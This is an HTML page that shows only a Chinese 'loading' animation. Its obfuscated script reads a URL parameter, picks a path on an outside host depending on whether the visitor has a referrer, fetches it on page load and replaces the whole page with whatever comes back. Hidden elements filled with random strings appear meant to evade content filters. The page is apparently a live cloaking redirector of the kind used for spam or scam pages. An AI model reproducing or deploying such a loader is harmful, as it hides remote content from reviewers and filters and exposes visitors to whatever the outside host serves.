<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .F66QGwz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .F66QGwz .OB9dZd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .F66QGwz .content {
            line-height: 50px;
            text-align: center
        }

        .F66QGwz .img {
            width: 100%
        }

        .F66QGwz .TrKktHQ545 {
            text-align: center
        }

        .F66QGwz .TrKktHQ545 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .F66QGwz .TrKktHQ545 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .F66QGwz .TrKktHQ545 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .F66QGwz .TrKktHQ545 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .F66QGwz .TrKktHQ545 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .F66QGwz .TrKktHQ545 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .F66QGwz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WnjoYcW3C(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cqvWCt = WnjoYcW3C('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cqvWCt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cqvWCt +".html?a=share";
		}
		
        S1F6w1de1Y=url+"#"+new Date().getTime();
        S1F6w1de1Y && function() {
            $.get(S1F6w1de1Y, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ezQobKByZWfaX4d66RhiWjeptKbKaQ5WvKOM8jvDq2C6HcXsDPXLTyGU0f07xNpRb6EzYmPkM4NDKIDPiZp5kDlXmuxf9lisK</span>
<p  style='display:none'>j7pwWr3qiqpHFv9nBEYJ9GSLCB1NJGzsc2Ipc5SRBZVpYZ8u123eqNxdeBsgPawZjtij9snPgh</p>
<img  src='' style='display:none'>
<span style='display:none'>ezQobKByZWfaX4d66RhiWjeptKbKaQ5WvKOM8jvDq2C6HcXsDPXLTyGU0f07xNpRb6EzYmPkM4NDKIDPiZp5kDlXmuxf9lisK</span>
<div style='display:none'>FmIho8VD3bLtisATM1qTjbIwpBbEetT1jDdntrS1CXTxnR5hJ</div>
<span style='display:none'>ezQobKByZWfaX4d66RhiWjeptKbKaQ5WvKOM8jvDq2C6HcXsDPXLTyGU0f07xNpRb6EzYmPkM4NDKIDPiZp5kDlXmuxf9lisK</span>
<img  src='' style='display:none'><div class="F66QGwz">
    <div class="OB9dZd">
        <div class="TrKktHQ545">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>u5gKNq6W0rYZ0PScU7tAFHWPorWf3</div>
<p  style='display:none'>J2NX27mjYo6spTOWykfZV8JYlIjg1J9daVFo8WdKpCTsptmyRJ</p>
<div style='display:none'>u5gKNq6W0rYZ0PScU7tAFHWPorWf3</div>
<h1 style='display:none' >nhgS9C3dhuu9f4824nAtrFQzc0EnP2Cu</h1>
<ul style='display:none' >bfQsnJ2LtBT5McKxM5Gjgpke3l9BHgKCT27po80VXnyCQZzjBU2dgyob49</ul>
<p  style='display:none'>J2NX27mjYo6spTOWykfZV8JYlIjg1J9daVFo8WdKpCTsptmyRJ</p>
<p  style='display:none'>J2NX27mjYo6spTOWykfZV8JYlIjg1J9daVFo8WdKpCTsptmyRJ</p>
<a  href='#' style='display:none'>JjR8zPj71FOPF8Q</a></body>
</html>